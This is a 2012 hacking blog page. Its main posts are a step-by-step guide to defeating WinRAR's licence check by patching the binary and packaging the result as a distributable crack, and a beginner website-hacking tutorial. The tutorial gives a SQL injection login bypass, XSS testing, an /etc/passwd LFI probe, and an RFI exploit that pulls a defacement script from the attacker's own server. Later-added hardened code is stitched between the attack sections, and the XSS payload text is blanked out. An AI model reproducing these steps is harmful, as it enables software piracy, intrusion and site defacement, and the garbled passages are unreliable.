Monday, June 04, 2012

Step-by-Step Guide to Crack WinRAR



I will be writing about a challenge I got on Facebook, where I cracked WinRAR 3.80 using a disassembler, and I will walk through the same thing here. You can crack any version of WinRAR with this method without paying the registration fee, and you can do it all by yourself, easily. Furthermore, most major software is cracked the same way; the methodology just gets a bit more complex. This tutorial is intended for those who are new to cracking and disassembling.

*This tutorial is intended for educational purposes only*

The Tools -

To perform this hack you will need:
  1. Any disassembler (I use Hacker's Disassembler and Hview)
  2. Resource Hacker
  3. A patch creator (use Universal Patch Creator or Code Fusion)
You will be able to find them with Google.

How to Crack?

You need a bit of knowledge of assembly language, and in case you don't have it, just memorize the steps and it will work any time, every time. Download the latest version of WinRAR from their website and install it.
I will be cracking WinRAR 3.80 here (because I already have it :P). This is basically a 2-step process (4 steps, if you want to do things with a professional touch).


Now copy the WinRAR.exe file to the desktop. Make a copy of it there and work on that copy.

Step 1 – Hunting for Memory Address

Now start Hacker's Disassembler and load the copy in it.

The disassembler will turn the executable into assembly code. Now you need to search for the strings used in the WinRAR program. Press Ctrl + F, type "evaluation" without the quotes, and hit Enter to search the assembly code.

After you have reached this block of code by searching, look at the block of code above it. There you will find that some values are being compared and then execution jumps to some other function. Now look carefully: the "evaluation copy" function must be invoked after some specific condition is met. We need to find that condition in the code and change it so that the program doesn't check for the condition.

In the code above it you can see this:
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
This is the code responsible for validating you as a legal user :). Just note down the memory address of the conditional jump (JNE) to some memory location. In this case, note down 00444B71.
Note: For any other WinRAR version, this code and memory address might be different, but the JNE will be the same. Just note down the address of the respective check.
Now you need to search for the code that brings up that ugly nag screen, "Please purchase WinRAR license", after your 40-day trial period is over. For this, look at your toolbar and click on "D", which stands for Dialog references.


Now in the dialog box that opens, search for "please" and you will get the reference as:
ID-REMINDER, "Please purchase WinRAR license"

Double click on it and you will reach the corresponding code.

The code will be something like:
* String: "REMINDER"
0048731A: 68EB5E4B00 push 004B5EEB
Just note the memory address that invokes the REMINDER dialog. In this case it's 0048731A. Note it down.

Note: For any other WinRAR version, this code and memory address might be different, but the REMINDER address will always be a PUSH. Just note down the address of that PUSH.

Step 2 – Fixing and Patching

Now in this step we will be patching the values at the memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker's Disassembler into Hview.


After you have loaded it, you will see the code is unreadable; it's just like opening an EXE file in Notepad. You need to decode it. To do that, press F4 and you will get an option to decode it. Hit DECODE and you will see the code as assembly with memory addresses.


After you have done that, you need to search for the memory addresses you noted down earlier. Hit F5 and a search box will appear. Now enter the memory address: type a "." and then the memory address without the leading "00"; the "." stands for "00". i.e.:
Type .444B71 in place of 00444B71


and search for it in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code. Now make the following changes:


After you have done it, save it by pressing F9.
Now search for the next memory location by pressing F5 and entering it. Reach it and make the following changes by pressing F3:



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats... you have cracked WinRAR :) Replace the original WinRAR.exe with this copy of winrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE

Now that you have a 100% working EXE, you might want to change the registration information shown in WinRAR. To do this, you can use Resource Hacker.



Launch Resource Hacker and load the copy of winrar.exe in it.



Now go to DIALOG –> expand the tree –> ABOUT RARDLG and click it. Now find the "Trial copy" line and replace it with your favorite one :P



and click on the Compile Script button.


Now save the file with any name on your desktop or any other location whatsoever.




Now you have a fully patched WinRAR.exe file :) You can either use it, or distribute it like a real cracker. If you want to learn that, move on to the next step.

Step 4 – Creating a working Patch (or giving it a professional touch :P)

I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version, just like the ones you have downloaded at any time of your life from any crack and keygen website.

Launch the patch creator and click on Add New Project. Enter the project information and click on Save.


Click on Add –> Offset Patch



After you have done that, double click on Offset Patch and then:
  1. Give the path of the original winrar.exe
  2. Give the path of the unmodified winrar.exe (again)
  3. Give the path of the fully patched winrar.exe (i.e. the cracked winrar.exe in this case)
  4. Click on Compare and it will show the differences between both files
  5. Click on Save.


Now in the next window, click on Create Patch and save it. The patch will be created. Now copy it into the WinRAR installation directory and hit Patch, it WILL


Congrats, you have created a patch of your own and have learned to crack WinRAR :)


You can crack other software the same way... just practice, debug and disassemble and you will find the way.



:)

Saturday, June 02, 2012

Basic Website Hacking Tutorial for beginners


Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...


SQL Injection

SQL injection is the act of injecting your own, custom-crafted SQL commands into a web script so that you can manipulate the database any way you want. Some example uses of SQL injection: bypassing login verification, adding a new admin account, lifting passwords, lifting credit-card details, etc.; you can access anything that's in the database.

Example Vulnerable Code – login.php (PHP/MySQL)
Here's an example of vulnerable login code.
PHP Code:

<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    // Minimal form; the field names u and p match the $_POST keys above.
    echo("<form method=post>
        <input name=u> <input name=p type=password> <input type=submit>
    </form>");
} else {
    // User input is pasted straight into the SQL text: this is the injection point.
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>

Basically what this code does is take the username and password input and fetch the user's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw a "'" into the inputs and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection, which anyone can tell you is no fun. Otherwise, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement and just let ourselves in. To do this, we would simply put "Administrator" in the username box and "' OR 1=1--" into the password box; the resulting SQL query run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it ignores the password requirement: as we all know, the logic of "OR" only requires one side to be true for the whole condition to succeed, and since 1 always equals 1, it works. The "--" is the comment character in SQL, which means everything after it is ignored; otherwise the trailing "'" would ruin the syntax and just cause the query to fail.
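A hardened version of login.php, added here as an example and not code from the original post: the values reach the database through bound parameters, so the "' OR 1=1--" password above is compared as a literal string and never alters the query. It assumes a `users` table with a `password_hash` column (constructed for the example) and placeholder PDO credentials.

```php
<?php
// Added example, not from the original post. Assumes a `users` table with
// columns `username`, `password_hash` (bcrypt, from password_hash()) and `IP`.

// Returns the stored IP on a valid login, or null on failure.
function find_user_ip(PDO $pdo, string $user, string $pass): ?string
{
    // The query text is fixed; :u is sent to the server separately from it,
    // so a value like "' OR 1=1--" can never change the WHERE clause.
    $stmt = $pdo->prepare(
        'SELECT `IP`, `password_hash` FROM `users` WHERE `username` = :u'
    );
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Check the password against its hash instead of storing it in clear.
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return $row['IP'];
}

$user = $_POST['u'] ?? '';
$pass = $_POST['p'] ?? '';

if ($user === '' || $pass === '') {
    echo '<form method="post">'
       . '<input name="u"> <input name="p" type="password"> '
       . '<input type="submit" value="Login"></form>';
} else {
    // Placeholder DSN and credentials; replace with your own.
    $pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4',
                   'appuser', 'CHANGE_ME', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]);

    if (find_user_ip($pdo, $user, $pass) !== null) {
        // Encode the username on output so the welcome line is not an XSS sink.
        echo 'Welcome, ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . '.';
    } else {
        echo 'Incorrect login details.';
    }
}
```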

XSS (Cross-Site Scripting)
This vulnerability allows an attacker's input to be sent to unsuspecting victims. The primary use of this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time).

Example Vulnerable Code – search.php (PHP)
PHP Code:

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
// the raw parameter is echoed straight into the HTML: this is the XSS sink
echo("You searched for $s. There were no results found");
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, rendered in red; else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointing to "search.php?search=// ". This will output "You searched for // . There were no results found" (HTML), and assuming the target's browser supports JS (JavaScript), which all modern browsers do unless the setting is turned off, it will redirect them to abc.
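A hardened search.php, added here as an example and not from the original post: the search term is HTML-encoded on output, and the session cookie is flagged HttpOnly so that script injected elsewhere cannot read it. The Content-Security-Policy value is an assumed starting policy, and the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Added example, not from the original post.

// Encode untrusted text for use in an HTML body or a quoted attribute.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The session cookie is the usual theft target; HttpOnly keeps it out of
// document.cookie and Secure keeps it off plain HTTP. (PHP 7.3+ array form.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Assumed baseline policy: no inline script, scripts only from this origin,
// so a tag that slips past encoding somewhere still does not execute.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('X-Content-Type-Options: nosniff');

$s = $_GET['search'] ?? '';
// A real search engine would do some database stuff here.
echo 'You searched for ' . e($s) . '. There were no results found.';
// The probe <font color=red>XSS</font> from the text above now arrives in
// the browser as &lt;font color=red&gt;XSS&lt;/font&gt; and shows as text.
```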

RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file and have it parsed and executed on the local server.

Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
    // the request parameter is used directly as the include path: this is the RFI/LFI sink
    include($page);
} else {
    include("home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI, but it still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server.
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
If we then view "index.php?p=http://our.site.com/malicious.php", our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
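A hardened index.php, added here as an example and not from the original post: the p parameter is a key into a fixed list of pages rather than a path, so neither a URL nor /etc/passwd can reach include(). The pages/ directory and page names are assumed; allow_url_include=Off in php.ini (the default) is the server-side backstop against RFI.

```php
<?php
// Added example, not from the original post. Assumes the includable pages
// live under ./pages/ and are listed here; nothing else is ever included.
$pages = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(array $pages, string $p): ?string
{
    // Unknown key: reject. The request value is only ever used as a lookup
    // key, never as a file name, so "http://..." or "/etc/passwd" cannot match.
    if (!array_key_exists($p, $pages)) {
        return null;
    }
    // Belt and braces: even the mapped file must resolve inside pages/.
    $base = realpath(__DIR__ . '/pages');
    $file = ($base === false) ? false : realpath($base . '/' . $pages[$p]);
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$file = resolve_page($pages, $_GET['p'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page.');
}
include $file;
// Server side: keep allow_url_include=Off (and ideally allow_url_fopen=Off)
// in php.ini, so include() of an http:// URL is refused regardless of code.
```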

Friday, June 01, 2012

Warning: Internet to face global outage on July 9


A virus that entered, infected and took control of computers across the world might cause their users to lose access to the internet in July, as I warned everyone earlier.

A group of hackers across the world took control of infected computers in an online advertising scam.

Around 350,000 PC users have machines infected with an invisible, undetectable 'Trojan' computer virus that sends users to unintended and illegal sites. After July 9, infected users won't be able to connect to the internet.

Look at the previous posts to learn the defense method.

Thursday, May 31, 2012

Backtrack | How to INSTALL BackTrack5



For hackers who want to do penetration testing or go a bit further with hacking, BackTrack 5 is a good choice...

First you need to download BackTrack 5 from this link: http://www.backtrack-linux.org/downloads/
Also download UNetbootin, which is required: http://unetbootin.sourceforge.net/

Requirements:
1. USB (Flash Drive) (Minimum USB Drive capacity 4 GB)
2. Backtrack 5 ISO file, md5sum verified(which is available on above link)
3. UNetbootin

Now the procedure to burn your USB drive:
> Plug in your USB drive
> Format the USB drive to FAT32
> Start UNetbootin and select the "Diskimage" option, then choose the BackTrack 5 ISO file you downloaded at the start of this tutorial.
> Select the amount of space to use for persistence in MB
> Select your USB drive and click "OK" to create a bootable BackTrack USB drive
> Once rebooted, remember that the default username and password are root/toor.

**Now your USB drive is ready to install BackTrack 5...

First of all, boot the BackTrack live environment.
At the bash prompt, type startx to enter the GUI.
Double click install Backtrack.sh, which you can see on the desktop.

**Now the step-by-step installation process...
Select the language and click on the Forward button.
Select your geographical location and time zone, then click on the Forward button.
Choose your keyboard layout, or leave the default.
In the next screen choose the "Erase and use the entire disk" option and click Forward.
The next screen will show you the installation options; make sure everything is fine, then click on the Forward button to start the installation process.
When the installation finishes you will need to press the Restart button, and then enjoy BackTrack 5.

NOTE: the default user name is root and the password is toor.


Don't forget to change it...
You can also use BackTrack 5 alongside other operating systems like Windows XP, Windows 7, etc. with a dual-boot setup.

Wednesday, May 30, 2012

How to Convert iOS 5.1.1 Tethered Jailbreak to Untethered Jailbreak Using Rocky Racoon 5.1.1 Untether



Rocky Racoon 5.1.1 Untether is a jailbreak package on Cydia that allows users who have a tethered jailbroken iOS device on iOS 5.1.1 to convert it into an untethered jailbreak.

Rocky Racoon is the underlying untethered jailbreak that is installed by popular jailbreak tools such as redsn0w and Absinthe... if you are on 5.1.1 and you can reboot your device and have it still jailbroken, you already have Rocky Racoon.

If your device relies on Rocky Racoon for untethering, which includes any iPad 2, iPad 3 or iPhone 4S running 5.1.1, uninstalling this package will un-jailbreak your device.

So if you have a tethered jailbroken iOS device on iOS 5.1.1, you can follow these simple steps to convert it into an untethered jailbreak.
  • Launch Cydia
  • Tap on the Search Tab
  • Then search for Rocky Racoon
  • Select Rocky Racoon 5.1.1 Untether from the search results
  • Then tap on the Install button, followed by the Confirm button
  • After it is successfully installed, reboot your device.
If your iOS device reboots without having to perform a tethered boot, then you've successfully converted your jailbroken device to an untethered jailbreak using Rocky Racoon...



 
Design by Secure Hackers